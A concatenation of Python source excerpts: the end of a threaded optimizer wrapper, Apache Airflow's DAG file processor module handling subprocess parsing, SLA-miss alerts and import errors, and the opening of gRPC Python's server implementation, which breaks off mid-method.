        # Set up the two-event handshake state and launch the optimizer thread.
        super().initialize(**kwargs)
        self._exit_thread = False # exit flag
        # events for mutual locking:
        #   _event_x_ready - the optimizer thread has published self._x
        #   _event_y_ready - the main thread has published self._y
        self._event_x_ready = Event()
        self._event_x_ready.clear()
        self._event_y_ready = Event()
        self._event_y_ready.clear()
        # start thread
        self._optimizer_thread = Thread(target=self._minimize)
        self._optimizer_thread.start()

    def _next(self):
        # let the optimizer thread calculate x
        self._event_x_ready.wait()
        return self._x

    def add_data(self, evaluation):
        # Hand the observed value back to the optimizer thread (which is
        # blocked inside f() waiting on _event_y_ready).
        super().add_data(evaluation)
        self._y = evaluation['y']
        self._event_x_ready.clear()
        self._event_y_ready.set()
        self._event_x_ready.wait() # block main thread until next x is calculated, or optimizer thread terminates

    def finalize(self):
        # Request shutdown: f() raises SystemExit once _exit_thread is set,
        # ending the optimizer thread, which we then join.
        self._exit_thread = True
        self._event_y_ready.set() # unblock optimizer thread
        self._optimizer_thread.join()
        return super().finalize()

    def _minimize(self):
        # Thread entry point: run the user-supplied minimize routine.
        self.minimize()
        # NOTE(review): `_exit` is written here but never read anywhere in
        # this class; it looks like `_exit_thread` was intended - confirm.
        self._exit = True
        self._event_x_ready.set() # unblock main thread

    def minimize(self):
        """ Start the minimize routine here.
        e.g. call here: scipy.optimize.minimize(self.f, self.x0, method='Nelder-Mead')
        """
        raise NotImplementedError

    def f(self, x):
        # Objective seen by the optimizer: publish x, block until the main
        # thread supplies y via add_data(), then return it (negated).
        self._x = x
        self._event_x_ready.set()
        self._event_y_ready.wait()
        self._event_y_ready.clear()
        # if exit flag is set, terminate thread
        if self._exit_thread:
            sys.exit()
        return -1*self._y # maximize signal, hence "-1*"
|
processor.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import logging
import multiprocessing
import os
import signal
import threading
import time
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Iterator, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import func, or_
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.callbacks.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.models import SlaMiss, errors
from airflow.models.dag import DAG, DagModel
from airflow.models.dagbag import DagBag
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.state import State
# Short aliases for the ORM models used throughout this module.
DR = models.DagRun
TI = models.TaskInstance
class DagFileProcessorProcess(LoggingMixin, MultiprocessingStartMethodMixin):
    """Runs DAG processing in a separate process using DagFileProcessor

    :param file_path: a Python file containing Airflow DAG definitions
    :param pickle_dags: whether to serialize the DAG objects to the DB
    :param dag_ids: If specified, only look at these DAG ID's
    :param callback_requests: failure callback to execute
    """

    # Counter that increments every time an instance of this class is created
    class_creation_counter = 0

    def __init__(
        self,
        file_path: str,
        pickle_dags: bool,
        dag_ids: Optional[List[str]],
        callback_requests: List[CallbackRequest],
    ):
        super().__init__()
        self._file_path = file_path
        self._pickle_dags = pickle_dags
        self._dag_ids = dag_ids
        self._callback_requests = callback_requests

        # The process that was launched to process the given .
        self._process: Optional[multiprocessing.process.BaseProcess] = None
        # The result of DagFileProcessor.process_file(file_path).
        self._result: Optional[Tuple[int, int]] = None
        # Whether the process is done running.
        self._done = False
        # When the process started.
        self._start_time: Optional[datetime.datetime] = None
        # This ID is use to uniquely name the process / thread that's launched
        # by this processor instance
        self._instance_id = DagFileProcessorProcess.class_creation_counter
        # Receiving end of the pipe the child sends its result through;
        # set by start().
        self._parent_channel: Optional[MultiprocessingConnection] = None
        DagFileProcessorProcess.class_creation_counter += 1

    @property
    def file_path(self) -> str:
        """Path of the DAG file this processor handles."""
        return self._file_path

    @staticmethod
    def _run_file_processor(
        result_channel: MultiprocessingConnection,
        parent_channel: MultiprocessingConnection,
        file_path: str,
        pickle_dags: bool,
        dag_ids: Optional[List[str]],
        thread_name: str,
        callback_requests: List[CallbackRequest],
    ) -> None:
        """
        Process the given file.

        :param result_channel: the connection to use for passing back the result
        :param parent_channel: the parent end of the channel to close in the child
        :param file_path: the file to process
        :param pickle_dags: whether to pickle the DAGs found in the file and
            save them to the DB
        :param dag_ids: if specified, only examine DAG ID's that are
            in this list
        :param thread_name: the name to use for the process that is launched
        :param callback_requests: failure callback to execute
        :return: the process that was launched
        :rtype: multiprocessing.Process
        """
        # This helper runs in the newly created process
        log: logging.Logger = logging.getLogger("airflow.processor")

        # Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
        # the child, else it won't get closed properly until we exit.
        log.info("Closing parent pipe")
        parent_channel.close()
        del parent_channel

        set_context(log, file_path)
        setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")

        try:
            # redirect stdout/stderr to log
            with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
                StreamLogWriter(log, logging.WARN)
            ), Stats.timer() as timer:
                # Re-configure the ORM engine as there are issues with multiple processes
                settings.configure_orm()

                # Change the thread name to differentiate log lines. This is
                # really a separate process, but changing the name of the
                # process doesn't work, so changing the thread name instead.
                threading.current_thread().name = thread_name

                log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
                dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
                result: Tuple[int, int] = dag_file_processor.process_file(
                    file_path=file_path,
                    pickle_dags=pickle_dags,
                    callback_requests=callback_requests,
                )
                result_channel.send(result)
            log.info("Processing %s took %.3f seconds", file_path, timer.duration)
        except Exception:
            # Log exceptions through the logging framework.
            log.exception("Got an exception! Propagating...")
            raise
        finally:
            # We re-initialized the ORM within this Process above so we need to
            # tear it down manually here
            settings.dispose_orm()

            result_channel.close()

    def start(self) -> None:
        """Launch the process and start processing the DAG."""
        start_method = self._get_multiprocessing_start_method()
        context = multiprocessing.get_context(start_method)

        # duplex=False: the parent end only receives, the child end only sends.
        _parent_channel, _child_channel = context.Pipe(duplex=False)
        process = context.Process(
            target=type(self)._run_file_processor,
            args=(
                _child_channel,
                _parent_channel,
                self.file_path,
                self._pickle_dags,
                self._dag_ids,
                f"DagFileProcessor{self._instance_id}",
                self._callback_requests,
            ),
            name=f"DagFileProcessor{self._instance_id}-Process",
        )
        self._process = process
        self._start_time = timezone.utcnow()
        process.start()

        # Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
        # from closing in some cases
        _child_channel.close()
        del _child_channel

        # Don't store it on self until after we've started the child process - we don't want to keep it from
        # getting GCd/closed
        self._parent_channel = _parent_channel

    def kill(self) -> None:
        """Kill the process launched to process the file, and ensure consistent state."""
        if self._process is None:
            raise AirflowException("Tried to kill before starting!")
        self._kill_process()

    def terminate(self, sigkill: bool = False) -> None:
        """
        Terminate (and then kill) the process launched to process the file.

        :param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
        """
        if self._process is None or self._parent_channel is None:
            raise AirflowException("Tried to call terminate before starting!")

        self._process.terminate()
        # Arbitrarily wait 5s for the process to die
        # (uses the private _popen handle; Process.join has no TimeoutError)
        with suppress(TimeoutError):
            self._process._popen.wait(5)  # type: ignore
        if sigkill:
            self._kill_process()
        self._parent_channel.close()

    def _kill_process(self) -> None:
        # SIGKILL the child if still alive, then reap it and close the pipe.
        if self._process is None:
            raise AirflowException("Tried to kill process before starting!")

        if self._process.is_alive() and self._process.pid:
            self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
            os.kill(self._process.pid, signal.SIGKILL)

            # Reap the spawned zombie. We active wait, because in Python 3.9 `waitpid` might lead to an
            # exception, due to change in Python standard library and possibility of race condition
            # see https://bugs.python.org/issue42558
            while self._process._popen.poll() is None:  # type: ignore
                time.sleep(0.001)

        if self._parent_channel:
            self._parent_channel.close()

    @property
    def pid(self) -> int:
        """
        :return: the PID of the process launched to process the given file
        :rtype: int
        """
        if self._process is None or self._process.pid is None:
            raise AirflowException("Tried to get PID before starting!")
        return self._process.pid

    @property
    def exit_code(self) -> Optional[int]:
        """
        After the process is finished, this can be called to get the return code

        :return: the exit code of the process
        :rtype: int
        """
        if self._process is None:
            raise AirflowException("Tried to get exit code before starting!")
        if not self._done:
            raise AirflowException("Tried to call retcode before process was finished!")
        return self._process.exitcode

    @property
    def done(self) -> bool:
        """
        Check if the process launched to process this file is done.

        :return: whether the process is finished running
        :rtype: bool
        """
        if self._process is None or self._parent_channel is None:
            raise AirflowException("Tried to see if it's done before starting!")

        if self._done:
            return True

        # Something (a result, or EOF) is available on the pipe.
        if self._parent_channel.poll():
            try:
                self._result = self._parent_channel.recv()
                self._done = True
                self.log.debug("Waiting for %s", self._process)
                self._process.join()
                self._parent_channel.close()
                return True
            except EOFError:
                # If we get an EOFError, it means the child end of the pipe has been closed. This only happens
                # in the finally block. But due to a possible race condition, the process may have not yet
                # terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
                # "suitable" timeout.
                self._done = True
                # Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
                self._process.join(timeout=5)
                if self._process.is_alive():
                    # Didn't shut down cleanly - kill it
                    self._kill_process()

        if not self._process.is_alive():
            self._done = True
            self.log.debug("Waiting for %s", self._process)
            self._process.join()
            self._parent_channel.close()
            return True

        return False

    @property
    def result(self) -> Optional[Tuple[int, int]]:
        """
        :return: result of running DagFileProcessor.process_file()
        :rtype: tuple[int, int] or None
        """
        if not self.done:
            raise AirflowException("Tried to get the result before it's done!")
        return self._result

    @property
    def start_time(self) -> datetime.datetime:
        """
        :return: when this started to process the file
        :rtype: datetime
        """
        if self._start_time is None:
            raise AirflowException("Tried to get start time before it started!")
        return self._start_time

    @property
    def waitable_handle(self):
        """Sentinel of the child process, suitable for multiprocessing.connection.wait()."""
        return self._process.sentinel
class DagFileProcessor(LoggingMixin):
    """
    Process a Python file containing Airflow DAGs.

    This includes:

    1. Execute the file and look for DAG objects in the namespace.
    2. Execute any Callbacks if passed to DagFileProcessor.process_file
    3. Serialize the DAGs and save it to DB (or update existing record in the DB).
    4. Pickle the DAG and save it to the DB (if necessary).
    5. Record any errors importing the file into ORM

    Returns a tuple of 'number of dags found' and 'the count of import errors'

    :param dag_ids: If specified, only look at these DAG ID's
    :param log: Logger to save the processing process
    """

    UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')

    def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
        super().__init__()
        self.dag_ids = dag_ids
        self._log = log

    @provide_session
    def manage_slas(self, dag: DAG, session: Session = None) -> None:
        """
        Finding all tasks that have SLAs defined, and sending alert emails
        where needed. New SLA misses are also recorded in the database.

        We are assuming that the scheduler runs often, so we only check for
        tasks that should have succeeded in the past hour.
        """
        self.log.info("Running SLA Checks for %s", dag.dag_id)
        if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
            self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
            return

        # Latest SUCCESS/SKIPPED execution date per task of this DAG.
        qry = (
            session.query(TI.task_id, func.max(DR.execution_date).label('max_ti'))
            .join(TI.dag_run)
            .with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
            .filter(TI.dag_id == dag.dag_id)
            .filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
            .filter(TI.task_id.in_(dag.task_ids))
            .group_by(TI.task_id)
            .subquery('sq')
        )
        # get recorded SlaMiss
        recorded_slas_query = set(
            session.query(SlaMiss.dag_id, SlaMiss.task_id, SlaMiss.execution_date).filter(
                SlaMiss.dag_id == dag.dag_id, SlaMiss.task_id.in_(dag.task_ids)
            )
        )

        # Task instances of the latest successful run of each task.
        max_tis: Iterator[TI] = (
            session.query(TI)
            .join(TI.dag_run)
            .filter(
                TI.dag_id == dag.dag_id,
                TI.task_id == qry.c.task_id,
                DR.execution_date == qry.c.max_ti,
            )
        )

        ts = timezone.utcnow()
        for ti in max_tis:
            task = dag.get_task(ti.task_id)
            if not task.sla:
                continue

            if not isinstance(task.sla, timedelta):
                raise TypeError(
                    f"SLA is expected to be timedelta object, got "
                    f"{type(task.sla)} in {task.dag_id}:{task.task_id}"
                )

            sla_misses = []
            # Walk forward through the scheduled dates after the latest
            # successful run; any scheduled date whose deadline
            # (logical_date + sla) has already passed is a miss.
            next_info = dag.next_dagrun_info(dag.get_run_data_interval(ti.dag_run), restricted=False)
            if next_info is None:
                self.log.info("Skipping SLA check for %s because task does not have scheduled date", ti)
            else:
                while next_info.logical_date < ts:
                    next_info = dag.next_dagrun_info(next_info.data_interval, restricted=False)

                    if next_info is None:
                        break
                    # Stop once we reach a date that already has a recorded miss.
                    if (ti.dag_id, ti.task_id, next_info.logical_date) in recorded_slas_query:
                        break

                    if next_info.logical_date + task.sla < ts:
                        sla_miss = SlaMiss(
                            task_id=ti.task_id,
                            dag_id=ti.dag_id,
                            execution_date=next_info.logical_date,
                            timestamp=ts,
                        )
                        sla_misses.append(sla_miss)
            if sla_misses:
                session.add_all(sla_misses)
        session.commit()

        # All misses recorded for this DAG that have not been notified yet.
        slas: List[SlaMiss] = (
            session.query(SlaMiss)
            .filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
            .all()
        )
        if slas:
            sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
            fetched_tis: List[TI] = (
                session.query(TI)
                .filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
                .all()
            )
            blocking_tis: List[TI] = []
            for ti in fetched_tis:
                if ti.task_id in dag.task_ids:
                    ti.task = dag.get_task(ti.task_id)
                    blocking_tis.append(ti)
                else:
                    # Task no longer exists in the DAG - drop the stale TI row.
                    session.delete(ti)
                    session.commit()

            task_list = "\n".join(sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas)
            blocking_task_list = "\n".join(
                ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis
            )
            # Track whether email or any alert notification sent
            # We consider email or the alert callback as notifications
            email_sent = False
            notification_sent = False
            if dag.sla_miss_callback:
                # Execute the alert callback
                self.log.info('Calling SLA miss callback')
                try:
                    dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
                    notification_sent = True
                except Exception:
                    Stats.incr('sla_callback_notification_failure')
                    self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
            email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""

            tasks_missed_sla = []
            for sla in slas:
                try:
                    task = dag.get_task(sla.task_id)
                except TaskNotFound:
                    # task already deleted from DAG, skip it
                    self.log.warning(
                        "Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
                    )
                    continue
                tasks_missed_sla.append(task)

            emails: Set[str] = set()
            for task in tasks_missed_sla:
                if task.email:
                    if isinstance(task.email, str):
                        emails |= set(get_email_address_list(task.email))
                    elif isinstance(task.email, (list, tuple)):
                        emails |= set(task.email)
            if emails:
                try:
                    send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
                    email_sent = True
                    notification_sent = True
                except Exception:
                    Stats.incr('sla_email_notification_failure')
                    self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
            # If we sent any notification, update the sla_miss table
            if notification_sent:
                for sla in slas:
                    sla.email_sent = email_sent
                    sla.notification_sent = True
                    session.merge(sla)
            session.commit()

    @staticmethod
    def update_import_errors(session: Session, dagbag: DagBag) -> None:
        """
        For the DAGs in the given DagBag, record any associated import errors and clears
        errors for files that no longer have them. These are usually displayed through the
        Airflow UI so that users know that there are issues parsing DAGs.

        :param session: session for ORM operations
        :param dagbag: DagBag containing DAGs with import errors
        """
        # Files that were parsed this round and produced no import error.
        files_without_error = dagbag.file_last_changed - dagbag.import_errors.keys()

        # Clear the errors of the processed files
        # that no longer have errors
        for dagbag_file in files_without_error:
            session.query(errors.ImportError).filter(
                errors.ImportError.filename.startswith(dagbag_file)
            ).delete(synchronize_session="fetch")

        # files that still have errors
        existing_import_error_files = [x.filename for x in session.query(errors.ImportError.filename).all()]

        # Add the errors of the processed files
        for filename, stacktrace in dagbag.import_errors.items():
            if filename in existing_import_error_files:
                session.query(errors.ImportError).filter(errors.ImportError.filename == filename).update(
                    dict(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace),
                    synchronize_session='fetch',
                )
            else:
                session.add(
                    errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
                )
            (
                session.query(DagModel)
                .filter(DagModel.fileloc == filename)
                .update({'has_import_errors': True}, synchronize_session='fetch')
            )

        session.commit()

    @provide_session
    def execute_callbacks(
        self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = NEW_SESSION
    ) -> None:
        """
        Execute on failure callbacks. These objects can come from SchedulerJob or from
        DagFileProcessorManager.

        :param dagbag: Dag Bag of dags
        :param callback_requests: failure callbacks to execute
        :param session: DB session.
        """
        for request in callback_requests:
            self.log.debug("Processing Callback Request: %s", request)
            try:
                # Dispatch on the concrete request type.
                if isinstance(request, TaskCallbackRequest):
                    self._execute_task_callbacks(dagbag, request)
                elif isinstance(request, SlaCallbackRequest):
                    self.manage_slas(dagbag.get_dag(request.dag_id), session=session)
                elif isinstance(request, DagCallbackRequest):
                    self._execute_dag_callbacks(dagbag, request, session)
            except Exception:
                # One failing callback must not prevent the others from running.
                self.log.exception(
                    "Error executing %s callback for file: %s",
                    request.__class__.__name__,
                    request.full_filepath,
                )

        session.commit()

    @provide_session
    def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
        # Run the DAG-level success/failure callback for the requested run.
        dag = dagbag.dags[request.dag_id]
        dag_run = dag.get_dagrun(run_id=request.run_id, session=session)
        dag.handle_callback(
            dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
        )

    def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
        # Run the task-level failure callback, if the task still exists in
        # the parsed DAG.
        simple_ti = request.simple_task_instance
        if simple_ti.dag_id in dagbag.dags:
            dag = dagbag.dags[simple_ti.dag_id]
            if simple_ti.task_id in dag.task_ids:
                task = dag.get_task(simple_ti.task_id)
                if request.is_failure_callback:
                    ti = TI(task, run_id=simple_ti.run_id)
                    # TODO: Use simple_ti to improve performance here in the future
                    ti.refresh_from_db()
                    ti.handle_failure_with_callback(error=request.msg, test_mode=self.UNIT_TEST_MODE)
                    self.log.info('Executed failure callback for %s in state %s', ti, ti.state)

    @provide_session
    def process_file(
        self,
        file_path: str,
        callback_requests: List[CallbackRequest],
        pickle_dags: bool = False,
        session: Session = None,
    ) -> Tuple[int, int]:
        """
        Process a Python file containing Airflow DAGs.

        This includes:

        1. Execute the file and look for DAG objects in the namespace.
        2. Execute any Callbacks if passed to this method.
        3. Serialize the DAGs and save it to DB (or update existing record in the DB).
        4. Pickle the DAG and save it to the DB (if necessary).
        5. Mark any DAGs which are no longer present as inactive
        6. Record any errors importing the file into ORM

        :param file_path: the path to the Python file that should be executed
        :param callback_requests: failure callback to execute
        :param pickle_dags: whether serialize the DAGs found in the file and
            save them to the db
        :param session: Sqlalchemy ORM Session
        :return: number of dags found, count of import errors
        :rtype: Tuple[int, int]
        """
        self.log.info("Processing file %s for tasks to queue", file_path)

        try:
            dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
        except Exception:
            self.log.exception("Failed at reloading the DAG file %s", file_path)
            Stats.incr('dag_file_refresh_error', 1, 1)
            return 0, 0

        if len(dagbag.dags) > 0:
            self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
        else:
            self.log.warning("No viable dags retrieved from %s", file_path)
            self.update_import_errors(session, dagbag)
            return 0, len(dagbag.import_errors)

        self.execute_callbacks(dagbag, callback_requests)

        # Save individual DAGs in the ORM
        dagbag.sync_to_db()

        if pickle_dags:
            paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)

            unpaused_dags: List[DAG] = [
                dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
            ]

            for dag in unpaused_dags:
                dag.pickle(session)

        # Record import errors into the ORM
        try:
            self.update_import_errors(session, dagbag)
        except Exception:
            self.log.exception("Error logging import errors!")

        return len(dagbag.dags), len(dagbag.import_errors)
|
_server.py | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import six
import grpc
from grpc import _common
from grpc import _interceptor
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_LOGGER = logging.getLogger(__name__)
# Completion-queue tags identifying server-lifecycle events.
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
# Tokens kept in an RPC state's "due" set while the corresponding batch
# operation is still outstanding on the completion queue.
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
    'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
    'send_initial_metadata * send_status_from_server')
# Client-stream states tracked on _RPCState.client.
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
# How often the serving thread wakes up to check for server deallocation.
_DEALLOCATED_SERVER_CHECK_PERIOD_S = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].message()
def _application_code(code):
    """Translate a grpc.StatusCode into its cygrpc equivalent, defaulting to unknown."""
    translated = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
    if translated is None:
        return cygrpc.StatusCode.unknown
    return translated
def _completion_code(state):
    """Status code for a normally-completing RPC: OK unless the servicer set one."""
    if state.code is not None:
        return _application_code(state.code)
    return cygrpc.StatusCode.ok
def _abortion_code(state, code):
    """Status code for an aborted RPC: a servicer-set code wins over *code*."""
    return code if state.code is None else _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
        collections.namedtuple('_HandlerCallDetails', (
            'method',
            'invocation_metadata',
        )), grpc.HandlerCallDetails):
    """Immutable (method, invocation_metadata) pair handed to generic handlers."""
    pass
class _RPCState(object):
    """Mutable per-RPC bookkeeping shared by the serving thread and handlers."""

    def __init__(self):
        # Guards every other attribute; all mutation happens while held.
        self.condition = threading.Condition()
        # Tokens of batch operations started but not yet completed.
        self.due = set()
        # Most recently received (deserialized) request message, if any.
        self.request = None
        # One of _OPEN / _CLOSED / _CANCELLED: state of the client stream.
        self.client = _OPEN
        # True until initial metadata has been sent (or scheduled).
        self.initial_metadata_allowed = True
        self.disable_next_compression = False
        self.trailing_metadata = None
        # Servicer-set status code/details; None means "not set".
        self.code = None
        self.details = None
        # True once a trailing status batch has been started.
        self.statused = False
        # RpcErrors raised at the servicer by _raise_rpc_error.
        self.rpc_errors = []
        # Termination callbacks; set to None once the RPC fully finishes.
        self.callbacks = []
        # Sentinel exception raised by ServicerContext.abort().
        self.abortion = None
def _raise_rpc_error(state):
    """Create an RpcError, record it on *state*, then raise it."""
    error = grpc.RpcError()
    state.rpc_errors.append(error)
    raise error
def _possibly_finish_call(state, token):
    """Retire *token*; when the RPC is fully drained, hand back its callbacks.

    Returns (state, callbacks) when the call just finished, (None, ()) otherwise.
    """
    state.due.remove(token)
    terminated = state.client is _CANCELLED or state.statused
    if terminated and not state.due:
        callbacks, state.callbacks = state.callbacks, None
        return state, callbacks
    return None, ()
def _send_status_from_server(state, token):
    """Build the completion callback for a send-status batch."""

    def on_status_sent(unused_send_status_from_server_event):
        with state.condition:
            return _possibly_finish_call(state, token)

    return on_status_sent
def _abort(state, call, code, details):
    """Terminate the RPC with an error status (no-op if the client cancelled)."""
    if state.client is not _CANCELLED:
        # A code/details pair set earlier through the servicer context wins
        # over the values passed in here.
        effective_code = _abortion_code(state, code)
        effective_details = details if state.details is None else state.details
        if state.initial_metadata_allowed:
            # Initial metadata was never sent: send (empty) initial metadata
            # and the trailing status together in one batch.
            operations = (
                cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
                cygrpc.SendStatusFromServerOperation(
                    state.trailing_metadata, effective_code, effective_details,
                    _EMPTY_FLAGS),
            )
            token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
        else:
            operations = (cygrpc.SendStatusFromServerOperation(
                state.trailing_metadata, effective_code, effective_details,
                _EMPTY_FLAGS),)
            token = _SEND_STATUS_FROM_SERVER_TOKEN
        call.start_server_batch(operations,
                                _send_status_from_server(state, token))
        state.statused = True
        state.due.add(token)
def _receive_close_on_server(state):
    """Build the completion callback for the receive-close-on-server batch."""

    def receive_close_on_server(receive_close_on_server_event):
        with state.condition:
            # cancelled() distinguishes client cancellation from a normal
            # half-close of the request stream.
            if receive_close_on_server_event.batch_operations[0].cancelled():
                state.client = _CANCELLED
            elif state.client is _OPEN:
                state.client = _CLOSED
            state.condition.notify_all()
            return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)

    return receive_close_on_server
def _receive_message(state, call, request_deserializer):
    """Build the completion callback for a receive-message batch."""

    def receive_message(receive_message_event):
        serialized_request = _serialized_request(receive_message_event)
        if serialized_request is None:
            # No payload: the client finished sending; close our view of
            # the request stream.
            with state.condition:
                if state.client is _OPEN:
                    state.client = _CLOSED
                state.condition.notify_all()
                return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
        else:
            # Deserialize outside the lock; publish the result under it.
            request = _common.deserialize(serialized_request,
                                          request_deserializer)
            with state.condition:
                if request is None:
                    _abort(state, call, cygrpc.StatusCode.internal,
                           b'Exception deserializing request!')
                else:
                    state.request = request
                state.condition.notify_all()
                return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)

    return receive_message
def _send_initial_metadata(state):
    """Build the completion callback for a send-initial-metadata batch."""

    def on_metadata_sent(unused_send_initial_metadata_event):
        with state.condition:
            return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)

    return on_metadata_sent
def _send_message(state, token):
    """Build the completion callback for a send-message batch; wakes waiters."""

    def on_message_sent(unused_send_message_event):
        with state.condition:
            state.condition.notify_all()
            return _possibly_finish_call(state, token)

    return on_message_sent
class _Context(grpc.ServicerContext):
    """Servicer-facing view of a single RPC; a thin wrapper over an _RPCState."""

    def __init__(self, rpc_event, state, request_deserializer):
        self._rpc_event = rpc_event
        self._state = state
        self._request_deserializer = request_deserializer

    def is_active(self):
        with self._state.condition:
            return self._state.client is not _CANCELLED and not self._state.statused

    def time_remaining(self):
        # Clamped at zero so an expired deadline never yields a negative value.
        return max(self._rpc_event.call_details.deadline - time.time(), 0)

    def cancel(self):
        self._rpc_event.call.cancel()

    def add_callback(self, callback):
        with self._state.condition:
            # callbacks is None once the RPC has fully terminated; report
            # failure instead of silently dropping the callback.
            if self._state.callbacks is None:
                return False
            else:
                self._state.callbacks.append(callback)
                return True

    def disable_next_message_compression(self):
        with self._state.condition:
            self._state.disable_next_compression = True

    def invocation_metadata(self):
        return self._rpc_event.invocation_metadata

    def peer(self):
        return _common.decode(self._rpc_event.call.peer())

    def peer_identities(self):
        return cygrpc.peer_identities(self._rpc_event.call)

    def peer_identity_key(self):
        id_key = cygrpc.peer_identity_key(self._rpc_event.call)
        return id_key if id_key is None else _common.decode(id_key)

    def auth_context(self):
        return {
            _common.decode(key): value
            for key, value in six.iteritems(
                cygrpc.auth_context(self._rpc_event.call))
        }

    def send_initial_metadata(self, initial_metadata):
        with self._state.condition:
            if self._state.client is _CANCELLED:
                _raise_rpc_error(self._state)
            else:
                # Initial metadata may be sent at most once per RPC.
                if self._state.initial_metadata_allowed:
                    operation = cygrpc.SendInitialMetadataOperation(
                        initial_metadata, _EMPTY_FLAGS)
                    self._rpc_event.call.start_server_batch(
                        (operation,), _send_initial_metadata(self._state))
                    self._state.initial_metadata_allowed = False
                    self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
                else:
                    raise ValueError('Initial metadata no longer allowed!')

    def set_trailing_metadata(self, trailing_metadata):
        with self._state.condition:
            self._state.trailing_metadata = trailing_metadata

    def abort(self, code, details):
        # treat OK like other invalid arguments: fail the RPC
        if code == grpc.StatusCode.OK:
